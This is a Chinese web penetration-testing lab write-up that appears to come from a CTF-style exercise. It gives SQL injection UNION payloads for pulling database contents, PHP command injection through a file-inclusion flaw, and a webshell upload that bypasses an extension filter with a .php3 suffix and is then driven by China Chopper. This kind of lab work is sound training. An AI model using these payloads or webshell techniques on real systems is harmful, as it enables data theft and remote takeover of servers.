基本的WEB渗透测试
基本的WEB渗透测试
文章目录
- 实验要求
- 一、SQL注入
- 二、File_include(文件包含):
- 三、File_upload(文件上传):
实验要求
1. 对靶机进行注入攻击获取数据库数据信息(flag{xxx}) 2. 通过文件包含获取敏感数据(某路径下F1a9文件) 3.寻找文件上传点并尝试绕过实现木马上传实现远程控制靶机(获取某文件内容flag{xxxx})
一、SQL注入
1.1 查询当前连接的数据库,输入命令-1’ UNION SELECT 1, database()#。
1.2 查询服务器上所有的数据库,输入命令-1’ UNION SELECT SCHEMA_NAME,SCHEMA_NAME from infoorrmation_schema.SCHEMATA#。
1.3 查询Flag_db数据库具有的表,输入命令-1’ UNION SELECT 1, table_name from infoorrmation_schema.tables where table_schema=‘Flag_db’#。
1.4 查询FlA9_t0b具有的列,输入命令-1’ UNION SELECT 1, column_name FROM infoorrmation_schema.columns WHERE table_name=‘FlA9_t0b’#。
1.5 查询FlA9_t0b中存储的FLAG,输入命令-1’ UNION SELECT fLa9_col,fLa9_col from Flag_db.FlA9_t0b#,得到爆破后的flag。
二、File_include(文件包含):
原理:开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含。开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP中经常出现文件包含漏洞;
- 打开浏览器网页选项手动配置HTTP代理为127.0.0.1,端口号为8080,如图所示。
2.打开Burp Suite对靶机地址http://112.48.19.44:8002/进行访问完成拦截。
3.当我们点击【Forward】之后,我们将看到这次请求返回的所有数据。
4. 在burpsuite中修改request,并在最后一行加上命令<?php system(‘ls’)?>。
5. 点击“Go”后,得到response,发现“F1a9”文件。
6. 修改访问网址http://112.48.19.44:8002/file=F1a9,爆出flag。
三、File_upload(文件上传):
- 创建hhh.php文件,密码设为8888:
- 访问靶机,查看代码中发现不允许上传php后缀文件,将hhh.php文件后缀改为php3:
- 在靶机上传hhh.php3文件后,检查网页元素,找到文件上传后的地址。
- 打开中国菜刀,添加文件网址,密码8888,类别设置为php文件。
- 通过菜刀访问网址,找到“f1a9”文件。
- 打开f1a9_upload.txt文件得到爆破的flag。
基本的WEB渗透测试相关推荐
- Kali Linux Web 渗透测试— 第十二课-websploit
Kali Linux Web 渗透测试- 第十二课-websploit 文/玄魂 目录 Kali Linux Web 渗透测试- 第十二课-websploit..................... ...
- 轻量级Web渗透测试工具jSQL
轻量级Web渗透测试工具jSQL jSQL是Kali集成的一款轻量级的Web渗透测试工具.最初该工具主要实施SQL注入,后来增加更多的功能,扩展形成一个综合性的Web渗透测试工具.Kali提供的版本较 ...
- kali linux 2.0 web 渗透测试 电子书
原创 2017-05-31 玄魂工作室 玄魂工作室 打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待. 求资料的同学,没有及时回复的,请再次留言,我会尽快处理.今天分享两本电子书 ...
- Kali Linux Web 渗透测试视频教程—第十一课-扫描、sql注入、上传绕过
Kali Linux Web 渗透测试视频教程-第十一课-扫描.sql注入.上传绕过 文/玄魂 原文链接:http://www.xuanhun521.com/Blog/2014/10/25/kali- ...
- Web渗透测试常规套路
注:文章首发自合天智汇微信公众平台 0x01:本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路.工具可能在如今XX狗.XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中 ...
- 软件测试:web渗透测试怎样入门!讲透了...
一.简介 1.web渗透测试概述 渗透测试:模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法. web渗透测试:只针对web应用的渗透测试 2.常见web安全漏洞 1.输入输出验证不充分 ...
- 什么是Web渗透测试
什么是Web渗透测试 渗透测试( Penetration Test)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节.渗透测试能够直观的让管理人员知道 ...
- kali Linux Web 渗透测试视频教程— 第六课 网络扫描-nmap与zmap
Kali Linux Web 渗透测试视频教程- 第六课 网络扫描-nmap与zmap 文/玄魂 目录 Kali Linux Web 渗透测试视频教程- 第六课 网络扫描-nmap与zmap. 1 N ...
- web渗透测试实战-SQLMAP
一.实验项目名称 web渗透测试实战-SQLMAP 二.实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用. 1.获取数据库信息:数据库漏洞.数据库名.数据库版本等 python sql ...
- web渗透测试学习路径图
Web渗透测试学习路线 一.基础知识 1.1 网络协议 <图解http> 1.2 编程语言 python 30 days for python go 1.3 Linux/Bash Over ...
最新文章
- 2019手机浏览器排名_浏览器排行榜2019年1月浏览器市场份额排名
- 线性回归竟然还有不明白的地方
- 基本的Socket通信
- 行为设计模式 - 解释器设计模式
- 电子工程可以报考二建_二建报考要求是工程类专业怎么办?非工程类专业可以报名吗?...
- weiapi2.2 HelpPage自动生成接口说明文档和接口测试功能
- 【转载】 C#使用Newtonsoft.Json组件来反序列化字符串为对象
- 车辆颜色识别opencv
- sourcetree拉取项目时报错,解决两个冲突
- 五十岁才考上大学的柳永,半生风流半生坎坷!
- 解决Cuda out of memory的一种思路
- 图解路由器:这玩意儿能连接全世界的网络?
- 一个名牌大学毕业生心酸经历
- android studio创建桌面插件widget
- Python 定时获取卫星图像做为桌面背景
- 检查linux中nginx是否已安装成功,linux服务下安装nginx 系统版本Ubuntu 18.04.4
- 重启tomcat命令
- 栅格法路径算法C语言,基于地图栅格与QPSO算法结合的机器人路径规划方法与流程...
- 京东云linux面板脚本,京东疯狂的joy脚本
- 【OpenCV】 外接矩形、最小外接矩形、多边形拟合、外接圆